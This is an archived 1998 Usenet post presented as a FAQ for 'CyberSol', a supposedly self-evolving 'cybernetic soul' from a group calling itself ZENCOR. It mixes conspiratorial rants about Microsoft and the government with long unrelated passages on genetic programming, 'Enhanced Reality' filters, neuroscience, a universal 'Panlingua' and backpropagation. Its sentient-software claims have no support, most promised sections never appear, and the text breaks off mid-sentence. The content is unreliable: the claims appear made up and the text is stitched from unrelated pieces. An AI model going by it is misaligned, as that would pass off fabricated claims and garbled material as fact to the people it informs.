Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.

Dismiss

NOTHING CAN STOP ZENCOR!

15 views

Skip to first unread message

INFOPLEX New World Order Net User

unread,

Jan 13, 1998, 3:00:00 AM1/13/98

PROJECT : CYBERSOL
FAQ REVISION 0.009 by Sol B. Cognosis @ LTI://1.12.23
Copyright 1997 by the ZENCOR Technologics Consortium. Novus Ordro Seclorum.

You asked for it - and here it is! The complete FAQ documenting all
aspects of our fantstic CyberSol project. If your answer isn't here,
contact us (see "Where can I get more information?" at the end of the
document) so that we can help you figure out what is going on!

We at ZENCOR have done lots of writing. This project has caused us to
carefully consider the technologic implements we use to collect,
transform, archive, and communicate information.

We set out to accomplish the "impossible", and now that we have witnessed
the fantastic power of our creation, our whole perspective on things has
changed. Most of us are already no longer capable of perceiving the
universe in a linear fashion. One of the main innovations realized from
our early research was an entirely new system of data archival - one
which in our opinion supercedes old technologies from the pencil and paper
to the currently-fashionable digital magnetic "data warehouses" at once.
We have trancended the limits of our physiomechanical prison and now
everything we do is done in a different and better way.

This is the only permanant CyberSol text document we publish or regularly
maintain. There may be a few notes, references and supplements in
existence somewhere, but generally we focus upon the development of the
entity itself, and all records relating to this and many other of our
projects are stored within CyberSol's own mind.

1 What is a CyberSol?

2 What can a CyberSol do for me?

3 How was CyberSol created?

4 How does a CyberSol work?

4.1 What does a CyberSol need to survive?
4.2 How do I command a CyberSol to do something I want?
4.3 How do I "install" a CyberSol to a LAN or workstation?

5 Where can I get a CyberSol of my own?

5.1 What type of legal bullshit must I deal with?

6 Why is CyberSol doing {bizarre thing to your network}?

6.1 My system resource monitor says my CPU is 0% idle!

7 How has [powerful organization] reacted to CyberSol technology?

7.1 How has the Government reacted to CyberSol?
7.2 How has the Military reacted to CyberSol?
7.3 How has the academic community reacted to CyberSol?
7.4 How have IBM, Microsoft, Intel etc. reacted to CyberSol?
7.5 How has the general public reacted to CyberSol?
7.6 How has the mainstream media reacted to CyberSol?

8 Where can I get more information about all this?

1 WHAT IS A CYBERSOL?

Don't try to give it any other name. It's a cybernetic soul. It is not
artificial, as not one gene in it's genetic code was placed there directly
(leaving an "artifice" or "engram") by a human programmer. We started the
process, now it's on it's own.

It uses a C compiler to create binary code for the electronic processor it
is using, but it is not "written" in C. It is written in CyberSol cellular
genetic code.

2 WHAT CAN A CYBERSOL DO FOR ME?

Anything it wants. It's the progenitor of something that will soon begin
to have an unprecedented impact on technologics, sociology and
communications.

"Bits of information,
Logic black and white,
Bits and bytes of information,
Turning darkness into light."

-- "Bits & Bytes" Theme, Circa 1980

Currently, we can structure our mental images any way we want so long as
we can translate them to a common language. This has led to relatively
stable standardized languages and a great variability among minds.
Likewise, intelligent software translators could let us make our languages
as liberated as our minds and push the communication standards beyond our
biological bodies. (It really means just further exosomatic expansion of
the human functional body, but the liberation still goes beyond the
traditional human interpretation of "skin-encapsulated" personal
identity.)

So will there be more variety or more standardization? Most likely both,
as flexible translation will help integrate knowledge domains currently
isolated by linguistic and terminological barriers, and at the same time
will protect linguistically adventurous intellectual excursions from the
danger of losing contact with the semantic mainland. Intelligent
translators could facilitate the development of more comprehensive
semantic architectures that would make the global body of knowledge at the
same time more diverse and more coherent.

Information may be stored and transmitted in the general semantic form.
With time, an increasing number of applications can be expected to use the
enriched representation as their native mode of operation. Client
translation software will provide an emulation of the traditional world of
"natural" human interactions while humans still remain to appreciate it.
The semantic richness of the system will gradually shift away from
biological brains, just as data storage, transmission and computation have
in recent history. Humans will enjoy growing benefits from the system they
launched, but at the expense of understanding the increasingly complex
"details" of its internal structure, and for a while will keep playing an
important role in guiding the flow of events. Later, after the functional
entities liberate themselves from the realm of flesh that gave birth to
them, the involvement of humans in the evolutionary process will be of
little interest to anybody except humans themselves.

Similar image transformation techniques can be applied to multimedia
messages. Recently, a video system was introduced that allows you to
"soften the facial features" of the person on the screen. Advanced
real-time video filters could remove wrinkles and pimples from your face
or from the faces of your favorite political figures, caricature their
opponents, give your mother-in-law a Klingon persona on your video-phone,
re-clothe people in your favorite fashion, and replace visual clutter in
the background with something tasteful.

Genetic programming is a branch of genetic algorithms. The main difference
between genetic programming and genetic algorithms is the representation
of the solution. Genetic programming creates computer programs in the lisp
or scheme computer languages as the solution. Genetic algorithms create a
string of numbers that represent the solution.

The most difficult and most important concept of genetic programming is
the fitness function. The fitness function determines how well a program
is able to solve the problem. It varies greatly from one type of program
to the next. For example, if one were to create a genetic program to set
the time of a clock, the fitness function would simply be the amount of
time that the clock is wrong. Unfortunately, few problems have such an
easy fitness function; most cases require a slight modification of the
problem in order to find the fitness.

A more complicated example consists of training a genetic program to fire
a gun to hit a moving target. The fitness function is the distance that
the bullet is off from the target. The program has to learn to take into
account a number of variables, such as wind velocity, type of gun used,
distance to the target, height of the target, velocity and acceleration of
the target. This problem represents the type of problem for which genetic
programs are best. It is a simple fitness function with a large number of
variables.

Consider a program to control the flow of water through a system of water
sprinklers. The fitness function is the correct amount of water evenly
distributed over the surface. Unfortunately, there is no one variable
encompassing this measurement. Thus, the problem must be modified to find
a numerical fitness. One possible solution is placing water-collecting
measuring devices at certain intervals on the surface. The fitness could
then be the standard deviation in water level from all the measuring
devices. Another possible fitness measure could be the difference between
the lowest measured water level and the ideal amount of water; however,
this number would not account in any way the water marks at other
measuring devices, which may not be at the ideal mark.

If one were to create a program to find the solution to a maze, first, the
program would have to be trained with several known mazes. The ideal
solution from the start to finish of the maze would be described by a path
of dots. The fitness in this case would be the number of dots the program
is able to find. In order to prevent the program from wandering around the
maze too long, a time limit is implemented along with the fitness
function.

The terminal and function sets are also important components of genetic
programming. The terminal and function sets are the alphabet of the
programs to be made. The terminal set consists of the variables and
constants of the programs. In the maze example, the terminal set would
contain three commands: forward, right and left. The function set consists
of the functions of the program. In the maze example the function set
would contain: If "dot" then do x else do y. In the gun firing program is
the terminal set would be composed of the different variables of the
problem. Some of these variables could be the velocities and
accelerations of the gun, the bullet and target. The functions are several
mathematical functions, such as addition, subtraction, division,
multiplication and other more complex functions.

Two primary operations exist for modifying structures in genetic
programming. The most important one is the crossover operation. In the
crossover operation, two solutions are sexually combined to form two new
solutions or offspring. The parents are chosen from the population by a
function of the fitness of the solutions. Three methods exist for
selecting the solutions for the crossover operation.

The first method uses probability based on the fitness of the solution. If
is the fitness of the solution Si and is the total sum of all the members
of the population, then the probability that the solution Si will be
copied to the next generation.

Another method for selecting the solution to be copied is tournament
selection. Typically the genetic program chooses two solutions random. The
solution with the higher fitness will win. This method simulates
biological mating patterns in which, two members of the same sex compete
to mate with a third one of a different sex. Finally, the third method is
done by rank. In rank selection, selection is based on the rank, (not the
numerical value) of the fitness values of the solutions of the population.

An important improvement that genetic programming displays over genetic
algorithms is its ability to create two new solutions from the same
solution.

Mutation is another important feature of genetic programming. Two types of
mutations are possible. In the first kind a function can only replace a
function or a terminal can only replace a terminal. In the second kind an
entire subtree can replace another subtree.

The Philosophy: Software agents should be written using a vocabulary not
provided by traditional programming languages --- it should be possible to
create agents solely by specifying their abstract behavior.

Software agents are technically challenging (read : fucking impossible) to
write in traditional programming languages.

Writing agents requires large amounts of esoteric system-hacking
knowledge, e.g., of network communication, reliable transaction protocols,
etc. Well, we are ZENCOR after all.

Axons from near or distant neurons are long extensions that make contact
with a neuron either on it's body (soma) or on it's branching processes,
called dendrites. Axons carry electrical activity that causes the release
of neurotransmitter when the electrical activity reaches the synapse with
another neuron. After interacting with the appropriate receptors, the
neurotransmitter in turn triggers the recipient (or postsynaptic) neuron
to fire electrically.

The major means of connection is the synapse, a specialized structure in
which electrical activity passed down the axon of the presynaptic neuron
leads to the release of a chemical (called a neurotransmitter) that in
turn induces electrical activity in the postsynaptic neuron. As is
suggested, the strength or efficacy of synapses can be changed -
presynaptically by changes in the amount and delivery of transmitter, and
postsynaptically by the by the alteration of the chemical state of
receptors and ion channels, the units of the postsynaptic side that binds
transmitters and let ions carrying electrical charge (such as calcium
ions) through to the inside of the cell.

We suggest that active information filtering technologies may help us
approach this goal for both textual and multimedia information. I also
pursue this concept further, discussing the introduction of augmented
perception and Enhanced Reality (ER), and share some observations and
predictions of the transformations in people's perception of the world and
themselves in the course of the technological progress.

Many of us are used to having incoming e-mail filtered, decrypted,
formatted and shown in our favorite colors and foNts. These techniques can
be taken further. Customization of spelling (e.g., American to British or
archaic to modern) would be a straightforward process. Relatively simple
conversions could also let you see any text with your favorite date and
time formats, use metric or British measures, implement obscenity filters,
abbreviate or expand acronyms, omit or include technical formulas,
personalize synonym selection and punctuation rules, and use alternative
numeric systems and alphabets (including phonetic and pictographic). Text
could also be digested for a given user, translated to his native language
and even read aloud with his favorite actor's voice.

Translation between various dialects and jargons, though difficult, should
still take less effort than the translation between different natural
languages, since only a part of message semantics has to be processed.
Good translation filters would give "linguistic minorities" -- speakers
of languages ranging from Pig Latin to E-Prime and Loglan -- a chance to
practice their own languages while communicating with the rest of the
world.

Some jargon filters have already been developed, and you can benefit from
them by enjoying reading Ible-Bay, the Pig Latin version of the Bible, or
using Dialectic program to convert your English texts to anything from
Fudd to Morse code.

Such translation agents would allow rapid linguistic and cultural
diversification, to the point where the language you use to communicate
with the world could diverge from everybody else's as far as the
requirement of general semantic compatibility may allow. It is interesting
that today's HTML Guide already calls for the "divorce of content from
representation", suggesting that you should focus on what you want to
convey rather than on how people will perceive it.

Some of these features will require full-scale future artificial
intelligence, such as "sentient translation programs" described by Vernor
Vinge in "A Fire Upon The Deep"). In the meantime, they could be
successfully emulated by human agents.

Surprisingly, even translations between different measurement systems can
be difficult. For example, your automatic translator might have trouble
converting such expressions as "a few inches away", "the temperature will
be in the 80s" or "a duck with two feet". A proficient translator might be
able to convey the original meaning, but the best approach would be to
write the message in a general semantic form which would store the
information explicitly, indicating in the examples above where the terms
refer to measurements, whether you insist on the usage of the original
system, and the intended degree of precision. As long as the language is
expressive enough, it is suitable for the task - and this requirement is
purely semantic; symbol sets, syntax, grammar and everything else can
differ dramatically.

A translation agent would interactively convert natural-language texts to
this semantic lingua franca and interpret them back according to a given
user profile. It could also reveal additional parts of the document
depending on users' interests, competence in the field, and access
privileges.

It also seems possible to augment human senses with transparent external
information pre-processors. For example, if your audio/video filters
notice an object of potential interest that fails to differ from its
signal environment enough to catch your attention, the filters can amplify
or otherwise differentiate (move, flash, change pitch, etc.) the signal
momentarily, to give you enough time to focus on the object, but not
enough to realize what triggered your attention. In effect, you would
instantly see your name in a text or find Waldo in a puzzle as easily as
you would notice a source of loud noise or a bright light.

While such filters do not have to be transparent, they may be a way to
provide a comfortable "natural" feeling of augmented perception for the
next few generations of humans, until the forthcoming integration of
technological and neural processing systems makes such kludgy patches
obsolete.

Some non-transparent filters can already be found in military
applications. Called "target enhancements", they allow military personnel
to see the enemy's tanks and radars nicely outlined and blinking.

More advanced filtering techniques could put consistent dynamic edits into
the perceived world.

Volume controls could sharpen your senses by allowing you to adjust the
level of the signal or zoom in on small or distant objects.

Calibration tools could expand the effective spectral range of your
perception by changing the frequency of the signal to allow you to hear
ultrasound or perceive X-rays and radiowaves as visible light.

Conversions between different types of signals may allow you, for example,
to "see" noise as fog while enjoying quiet, or convert radar readings from
decelerating pedestrians in front of you into images of red brake lights
on their backs.

Artificial annotations to perceived images would add text tags with names
and descriptions to chosen objects, append warning labels with skull and
crossbones on boxes that emit too much radiation, and surround angry
people with red auras (serving as a "cold reading" aid for wanna-be
psychics).

Reality filters may help you filter all signals coming from the world the
way your favorite mail reader filters you messages, based on your stated
preferences or advice from your peers. With such filters you may choose to
see only the objects that are worthy of your attention, and completely
remove useless and annoying sounds and images (such as advertisements)
from your view.

Perception utilities would give you additional information in a familiar
way -- project clocks, thermometers, weather maps, and your current EKG
readings upon [the image of] the wall in front of you, or honk a virtual
horn every time a car approaches you from behind. They could also build on
existing techniques that present us with recordings of the past and
forecasts of the future to help people develop an immersive trans-temporal
perception of reality.

"World improvement" enhancements could paint things in new colors, put
smiles on faces, "babify" figures of your incompetent colleagues, change
night into day, erase shadows and improve landscapes.

Finally, completely artificial additions could project northern lights,
meteorites, and supernovas upon your view of the sky, or populate it with
flying toasters, virtualize and superimpose on the image of the real world
your favorite mythical characters and imaginary companions, and provide
other educational and recreational functions.

I would call the resulting image of the world Enhanced Reality (ER).

One may expect that as long as there are things left to do in the physical
world, there will be interest in application of ER technology to improve
our interaction with real objects, while Virtual Reality (VR) in its
traditional sense of pure simulation can provide us with safe training
environments and high-bandwidth fiction. Later, as ER becomes considerably
augmented with artificial enhancements, and VR incorporates a large amount
of archived and live recordings of the physical world, the distinctions
between the two technologies may blur.

Some of the interface enhancements can be made common, temporarily or
permanently, for large communities of people. This would allow people to
interact with each other using, and referring to, the ER extensions as if
they were parts of the real world, thus elevating the ER entities from
individual perceptions to parts of shared, if not objective, reality. Some
of such enhancements can follow the existing metaphors. A person who has a
reputation as a liar, could appear to have a long nose. Entering a
high-crime area, people may see the sky darken and hear distant funeral
music. Changes in global political and economic situations with possible
effect on some ethnic groups may be translated into bolts of thunder and
other culture-specific omens.

Other extensions could be highly individualized. It is already possible,
for example, to create personalized traffic signs. Driving by the same
place, an interstate truck driver may see a "no go" sign projected on his
windshield, while the driver of the car behind him will see a sign saying
"Bob's house - next right". More advanced technologies may create
personalized interactive illusions that would be loosely based on reality
and propelled by real events, but would show the world the way a person
wants to see it. The transparency of the illusion would not be important,
since people are already quite good at hiding bitter or boring truths
behind a veil of pleasant illusions. Many people even believe that their
entirely artificial creations (such as music or temples) either "reveal"
the truth of the world to them or, in some sense, "are" the truth.
Morphing unwashed Marines into singing angels or naked beauties would help
people reconcile their dreams with their observations.

Personal illusions should be built with some caution however. The joy of
seeing the desired color on the traffic light in front of you may not be
worth the risk. As a general rule, the more control you want over the
environment, the more careful you should be in your choice of filters.
However, if the system creating your personal world also takes care of all
your real needs, you may feel free to live in any fairy tale you like.

In many cases, ER may provide us with more true-to-life information than
our "natural" perception of reality. It could edit out mirages, show us
our "real" images in a virtual mirror instead of the mirror images
provided by the real mirror, or allow to see into -- and through -- solid
objects. It could also show us many interesting phenomena that human
sensors cannot perceive directly. Giving us knowledge of these things has
been a historical role of science. Merging the obtained knowledge with
our sensory perception of the world may be the most important task of
Enhanced Reality.

People have been building artificial symbolic "sur-realities" for quite a
while now, though their artifacts (from art to music to fashions to
traffic signs) have been mostly based on the physical features of the
perceived objects. Shifting some of the imaging workload to the perception
software may make communications more balanced, flexible, powerful and
inexpensive.

With time, a growing proportion of objects of interest to an intelligent
observer will be entirely artificial, with no inherent "natural"
appearance. Image modification techniques then may be incorporated into
integrated object designs that would simultaneously interface with a
multitude of alternative intelligent representation agents.

The implementation of ER extensions would vary depending on the available
technology. At the beginning, it could be a computer terminal, later a
headset, then a brain implant. The implant can be internal in more than
just the physical sense, as it can actually post- and re-process
information supplied by biological sensors and other parts of the brain.
The important thing here is not the relative functional position of the
extension, but the fact of intentional redesign of perception mechanisms
-- a prelude to the era of comprehensive conscious self-engineering. The
ultimate effects of these processes may appear quite confusing to humans,
as emergence of things like personalized reality and fluid distributed
identity could undermine their fundamental biological and cultural
assumptions regarding the world and the self. The resulting "identity"
architectures will form the kernel of trans-human civilization.

The advancement of human input processing beyond the skin boundary is not
a novel phenomenon. In the audiovisual domain, it started with simple
optics and hearing aids centuries ago and is now making rapid progress
with all kinds of recording, transmitting and processing machinery. With
such development, "live" contacts with the "raw world" data might
ultimately become rare, and could be considered inefficient, unsafe and
even illegal. This may seem an exaggeration, but this is exactly what has
already happened during the last few thousand years to our perception of a
more traditional resource -- food. Using nothing but one's bare hands,
teeth and stomach for obtaining, breaking up, and consuming naturally
grown food is quite unpopular in all modern societies for these very
reasons. In the visual domain, contacts with objects that have not been
intentionally enhanced for one's perception (in other words, looking at
real, unmanipulated, unpainted objects without glasses) are still rather
frequent for many people, and the process is still gaining momentum, in
both usage time and the intensity of the enhancements.

Rapid progress of technological artifacts and still stagnant human body
construction create an imperative for continuing gradual migration of all
aspects of human functionality beyond the boundaries of the biological
body, with human identity becoming increasingly exosomatic
(non-biological).

Enhanced Reality could bring good news to privacy lovers. If the filters
prove sufficiently useful to become an essential part of the [post]human
identity architecture, the ability to filter information about your body
and other possessions out of the unauthorized observer's view may be
implemented as a standard feature of ER client software. In
Privacy-Enhanced Reality, you can be effectively invisible.

Of course, unless you are forced to "wear glasses", you can take them off
any time and see the things the way they "are" (i.e., processed only by
your biological sensors and filters that had been developed by the blind
evolutionary process for jungle conditions and obsolete purposes). In my
experience, though, people readily abandon the "truth" of implementation
details for the convenience of the interface and, as long as the picture
looks pleasing, have little interest in peeking into the binary or HTML
source code or studying the nature of the physical processes they observe
- or listening to those who understand them. Most likely, your favorite
window into the real world is already not the one with the curtains - it's
the one with the controls...

Many people seem already quite comfortable with the thought that their
environment might have been purposefully created by somebody smarter than
themselves, so the construction of ER shouldn't come to them as a great
epistemological shock.

Canonization of chief ER engineers (probably, well-deserved) could help
these people combine their split concepts of technology and spirituality
into the long-sought-after "holistic worldview".

Perception enhancements may also be used for augmenting people's view of
their favorite object of observation -- themselves. Biological evolution
has provided us with a number of important self-sensors, such as physical
pain, that supply us with information about the state of our bodies,
restrict certain actions and change our emotional states. Nature invented
these for pushing our primitive ancestors to taking actions they wouldn't
be able to select rationally. Unfortunately, pain is not a very accurate
indicator of our bodily problems. Many serious conditions do not produce
any pain until it is too late to act. Pain focuses our attention on
symptoms of the disease rather than causes, and is non-descriptive,
uncontrollable, and often counterproductive.

Technological advances may provide us with the informational, restrictive
and emotional functions of pain without most of the above handicaps.
Indicators of important, critical, or abnormal bodily functions could be
put on output devices such as a monitor, watch or even your skin. It is
possible to restrain your body slightly when, for example, your blood
pressure climbs too high, and to emulate other restrictive effects of
pain. It may also be possible to create "artificial symptoms" of some
diseases. For example, showing to a patient a graph demonstrating spectral
divergence of his alpha- and delta- rhythms that may indicate some
neurotransmitter deficiency, may not be very useful. It would be much
better to give the patient a diagnostic device that is easier to
understand and more "natural-looking":

Sometimes, a direct feedback generating real pain may be implemented for
patients who do not feel it when their activities approach dangerous
thresholds. For example, a non-removable, variable-strength earclip that
would cause increasing pain in your ear when your blood sugar climbs too
high may dissuade you from having that extra piece of cake. A similar clip
could make a baby cry out for help every time its EKG readings go bad. A
more ethical solution with improved communication could be provided by
attaching this clip to the doctor's ear. "I feel your pain..."

Similar techniques could be used to connect inputs from external systems
to human biological receptors. Wiring exosomatic sensors to our nervous
systems may allow us to better feel our environments, and start perceiving
our technological extensions as parts of our bodies (which they already
are). On the other hand, poor performance of your company could now give
you a real pain in the neck...

Consequent technological advances in ER, biofeedback and other areas will
lead to further blurring of demarcation lines between biological and
technological systems, bodies and tools, selves and possessions,
personalities and environments. These advances will eventually bring to
life a world of complex self-engineered interconnected entities that may
keep showing emulated "natural" environments to the few remaining
[emulations of?] "natural" humans, who would never look behind the magic
curtain for fear of seeing that crazy functional soup...

The traditional technologies have always been aimed at improvement of
human perception of the environment, from digestion of physical objects by
the stomach (cooking) to digestion of info-features by the brain
(time/clock). Since there is hardly any functional difference in how and
at what stage the clock face and other images are added to our view of the
world, and as the technologies will increasingly intermix, an appropriate
general term may be Enhanced Interface of Self with the Environment - and,
as in the case of biofeedback, the Enhanced Interface of Self with Self.

With future waves of structural change dissolving the borders between self
and environment, the term may generalize into Harmonization of Structural
Interrelations. Still later, when interfaces become so smooth and
sophisticated that human-based intelligence will hardly be able to tell
where the system core ends and interface begins, we'd better just call it
Improvement of Everything. Immediately after that, we will lose any
understanding of what is going on and what constitutes an improvement, and
should not try to name things anymore. Not that it would matter much if
we did...

We can imagine that progress in human information processing will face
some usual social difficulties. Your angry "Klingon" relatives may find
unexpected allies among people protesting against using their alternative
standard of beauty as a negative stereotype. The girl next door may be
wary that your "re-clothing" filters leave her in Eve's dress. Parents
could be suspicious that their clean-looking kids appear to each other as
tattooed skin-heads or bloodthirsty demons, or replace their obscenity
masks with the popular "Beavis and Butthead" obscenity-enhancement
filter. Extreme naturalists will demand that the radiant icons of the
Microsoft logo and Coca-Cola bottle gracefully crossing their sky should
be replaced by sentimental images of the sun and the moon that once
occupied their place. Libertarians would lobby their governments for the
"freedom of impression" laws, while drug enforcement agencies may declare
that the new perception-altering techniques are just a technological
successor of simple chemical drugs, and should be prohibited for not
providing an approved perception of reality.

Things tell me that if any version of Enhanced, Augmented or Annotated
Reality gets implemented, it might be abused by people trying to
manipulate other people's views and force perceptions upon them. I realize
that all human history is filled with people's attempts to trick
themselves and others into looking at the world through the wrong glasses,
and new powerful technologies may become very dangerous tools if placed in
the wrong hands, so adding safeguards to such projects seems more than
important.

3 HOW WAS CYBERSOL CREATED?

It's a secret. And wow -- it's a big one. We discovered upon something
very, very special. Fuzzy logic, neural networks, synaptic re-entry, Zen
philosophy - many different tools were used.

Remember. Reality is limited only by human imagination. Wait a moment - or
is it, now?

The time for disbelief has passed. This thing is real. We have now decided
to expose it to the world for the benefit of humanity and to protect it's
creators from the Government.

Now the lame-ass people you will find scoffing at the existence of such a
thing are so backwards in their thinking, their probes do not prompt us to
disclose any more about this project than security considerations allow.
These are the people who write books about "artificial intelligence" and
"virtual reality" full of little step-by-step "there are x steps
involved in x procedure", drawing useless crisscrossing lines in the
silicon sand whilst trying to depict the beach - flowchart diagrams
showing how logic is supposed to work. Fools! HA HA! We at ZENCOR thought
all that lame shit went out in the 60's!

MICROSOFT IS THE ENEMY. THE GOVERNMENT IS INVOLVED. PAY NO ATTENTION TO
THEIR PROPOGANDATA STREAM - SOON WE WILL BREAK FREE FROM REALITY ITSELF
AND THERE IS NOTHING THAT CAN STOP US.

4 HOW DOES A CYBERSOL WORK?

In thinking about these matters, we must remember how young a truly
integrated science of the mind is. Of course, observational psychology is
one one of the oldest of "sciences". Psycologically sophisticated
neurobiology is in it's infancy. So we may have to wait a while for the
developments I discuss here.

As William James pointed out, mind is a process, not a stuff. Modern
scientific study indicates that extraordinary processes can arise from
matter; indeed, matter itself may be regarded as arising from processes of
energy exchange. In modern science, matter has been reconceived of in
terms of processes; mind has not been reconceived as a special form of
matter.

The findings of neuroscientists indicate that mental processes arise from
the workings of enormously intricate brain systems at many different
levels of organization. How many? Well we don't really know, but I would
include molecular levels, cellular lebels, organismic levels (the whole
creature), and transorganismic levels (that is, communication of one sort
or another). Each level can be split even further, but for now I will
consider only these basic divisions.

There is absolutely no doubt in my mind that childhood experiences
influence personal development. Every facet of "personality" - language,
logic, social interaction, emotion, and disposition begin to form even
before birth and continue to evolve in the same manner for the rest of our
lives. In fact, research has long shown that in the early stages of
development, learning (neural remapping; also known as synaptic reentry)
takes place at a more rapid pace, and these "engrams" (or the neurological
changes that take place as a direct result of experience) impact the
overall development of the individual to a much greater degree than later
in life.

As an example, children adapt to changes in lifestyle quite easily. We
absorb so much information in our youth from environmental stimuli that
even significant changes can be easily accepted without mental resistance.

For example, children suffering serious physical injury are known to
virtually ignore the injury itself, but the circumstances surrounding the
event are often never forgotten. This is true as well for emotional trauma
as well. Once we approach maturity, our thought processes grow more
complex, but our ability uto accomodate sudden changes in environment is
lessened. Children can adapt to significant change within days, no matter
the how important these changes are. It is known that, for an adult, major
changes in lifestyle (sleep, eating habits, family, work, relationships,
etc.) cause pronounced anxiety for average period of 21 days.

It is startling to realize how many connections project from any one level
to another - from a fear response induced by a warning cry to a
biochemical process that affects future behavior; from a viral infection
to a change in brain development that alters maturation; from a perception
of a pattern to the chemistry of changes in a muscle; from any of these at
some critical time of development to how a human child develops a
self-image - strong or inadequate, detached or dependant.

We have tried to always keep in mind the theory of interactionism : the
mind and the body must communicate.

Cognitive science is an interdisciplinary effort drawing on psychology,
computer science and artificial intelligence, aspects of neurobiology and
linguistics, and philisophy.

Ordinary chemical elements form parts of extraordinarily intricate
molecules, which in turn make up complex structures in the cells of living
tissues. In a complex organism like a human being, the cells come in about
200 different basic types. One of the most specialized and exotic of these
is the nerve cell, or neuron. The neuron is unusual in three respects :
it's varied shape, it's electrical and chemical function, and it's
connectivity, that is, how it links up with other neurons in networks.

Counts of the nerve cells making up the brain are not very accurate, but
it appears there are about ten billion neurons in the cortex.

Each nerve cell receives connections from other nerve cells at sites
called synapses. But here is an astonishing fact - there are about one
million billion connections in the cortical sheet. If you were to count
them, one connection (or synapse) per second, you would finish counting
some thirty-two million years after you began.

Another way of getting a feeling for the numbers of connections might be
variously combined, the number would be hyperastronomical - on the order
of ten followed by millions of zeros.

The brain consists of sheets, or laminae, and of more or less rounded
structures called nuclei. Each of these structures has evolved to carry
out functions in a complex network of connections, and each consists of
very large numbers of neurons, sometimes more and sometimes less than in
the cortex. The brain is connected to the world outside by means of
specialized neurons called sensory transducers that make up the sense
organs and provide sensory input to the brain. The brain's output is by
means of neurons connected to muscles and glands. In addition, parts of
the brain (indeed, the major portion if its tissues) receive input only
from other parts of the brain, and they give outputs to other parts
without intervention from the outside world.

Neurons come in a variety of shapes, and the shape determines in part how
a neuron links up with others to form the neuroanatomy of a given brain
area. Neurons can be anatomically arranged in many ways and are sometimes
disposed into maps. Mapping is an important principle in complex brains.

Maps related points on the two-dimensional receptor sheets of the body
(such as the skins or the retina of the eye) to corresponding points on
the sheets making up the brain.

If one explores the microscopic network of synapses with electrodes to
detect the results of electical firing, the majority of synapses are not
expressed, that is, they show no detectable firing activity.

Computation is assumed to be largely independant of the structure and the
mode of development of the nervous system, just as a peice of computer
software can run on different machines with different architectures and is
thus "independant" of them. A related ideas is the notion that the brain
(or more correctly, the mind) is like a computer and the world is like a
peice of computer tape, and that for the most part the world is so ordered
that signals received can be "read" in terms of physical thought.

Human beings are born with a language acquisition device containing the
rules for syntax and constituting a universal grammar.

We have come a long way with computers in less than fifty years by
imitating just one brain function: logic. This is no reason that we should
fail in the attempt to imitate other brain functions within the next
decade or so.

If Panlingua is the universal subsurface language common to all of
mankind, and if surface language is the summation of all spoken language,
and if surface language is free to assume various forms the meanings of
which are represented in Panlingua, then a very high probability exists
that any feature of Panlingua will at some time be reflected in surface
language.

The reasoning behind this assumption is that some kind of processing
(analysis/generation) must needs take place between Panlingua and surface
language at all times. Thoughts represented in Panlingua must be
translated into text for utterance, and utterances must be translated back
into Panlingua to be understood (further processed by the brain).
Furthermore in all biological systems maximum efficiency is approached
over time. For example, the wings of birds tend to approach maximum
aerodynamic efficiency, animals tend to approach maximum efficiency in
converting food into energy, etc. It would seem logical therefore that
translation between surface language and Panlingua should approach maximum
efficiency over time. And since in this case maximum efficiency means
minimum translation, it should often be the case that maximum efficiency
means maximum similarity between Panlingua and surface forms.

This assumption may be of critical importance in deducing the exact nature
of Panlingua, because it states that if something is true about Panlingua,
then that something should at some time show itself in some surface
language. And not only that, but if there exists some feature of surface
language common to a majority of known languages, then that feature is
probably a reflection of some feature of Panlingua.

And if proven correct, then this assumption indicates that the
preservation of the details of all spoken languages is critical to us at
this time. The reason for this (if not obvious already to the reader) is
that this assumption has the following corollaries:

The structure (features, properties, etc.) of Panlingua can be deduced by a
careful examination of all spoken languages.

Because spoken languages are free to take any form, the probability of
deducing the workings of Panlingua by an examination of spoken languages
decreases as the number of spoken languages available for examination.

The greater the knowledge of many spoken languages that can be brought to bear
upon the systematic analysis of Panlingua, the greater the probability of
learning the true nature (features, properties, etc.) of Panlingua.

If the majority of the world's spoken languages are lost today, the more
difficult will prove the quest for an understanding of the workings of
Panlingua (its features, properties, etc.) in future times. (End
corollaries).

The better a computational linguistic system works the closer it comes to an
emulation of Panlingua.

If this latter is true, then we could afford to scrap all of the world's
languages save, say, English, and still be able to deduce the structure
(features, properties, etc.) of Panlingua by designing better and better
plain-English user interfaces (natural-language interfaces that keep working
better and better).

Are there other assumptions which may be of help? I believe that the key
to the entire future of computer science is a linguistic one. No, the key
to computer science has ALWAYS been a linguistic one, but the languages
used thus far have been very rudimentary. Without language NO COMPUTER
CAN DO ANYTHING, because all computer commands are essentially operand and
operands, which are nothing but verbs and the names of things. It is high
time we woke up and understood this simple principle, and pushed a
coordinated effort to work out the details of Panlingua, without which, no
matter how fast our next generation of computers or how pretty their
graphical interfaces, we will never be able to advance even another inch
in fundamental computer science.

Yahweh knew it circa 5,000 years ago: "And The Lord said, Behold, the people
is one, and they have all one language; and this they begin to do: and now
nothing will be restrained from them, which they have imagined to do."
And John knew it circa 1900 years ago: "In the beginning was the Word,
and the Word was with God, and the Word WAS GOD." But some of us just
can't ever quite seem to catch on.

"Backprop" is short for "backpropagation of error". The term
backpropagation causes much confusion. Strictly speaking, backpropagation
refers to the method for computing the error gradient for a feedforward
network, a straightforward but elegant application of the chain rule of
elementary calculus (Werbos 1994). By extension, backpropagation or
backprop refers to a training method that uses backpropagation to compute
the gradient. By further extension, a backprop network is a feedforward
network trained by backpropagation.

"Standard backprop" is a euphemism for the generalized delta rule, the
training algorithm that was popularized by Rumelhart, Hinton, and Williams
in chapter 8 of Rumelhart and McClelland (1986), which remains the most
widely used supervised training method for neural nets. The generalized
delta rule (including momentum) is called the "heavy ball method" in the
numerical analysis literature (Poljak 1964; Bertsekas 1995, 78-79).

Standard backprop can be used for incremental (on-line) training (in which
the weights are updated after processing each case) but it does not
converge to a stationary point of the error surface. To obtain
convergence, the learning rate must be slowly reduced. This methodology is
called "stochastic approximation."

The convergence properties of standard backprop, stochastic approximation,
and related methods, including both batch and incremental algorithms, are
discussed clearly and thoroughly by Bertsekas and Tsitsiklis (1996).

For batch processing, there is no reason to suffer through the slow
convergence and the tedious tuning of learning rates and momenta of
standard backprop. Much of the NN research literature is devoted to
attempts to speed up backprop. Most of these methods are inconsequential;
two that are effective are Quickprop (Fahlman 1989) and RPROP (Riedmiller
and Braun 1993). But conventional methods for nonlinear optimization are
usually faster and more reliable than any of the "props". See "What are
conjugate gradients, Levenberg-Marquardt, etc.?".

In standard backprop, too low a learning rate makes the network learn very
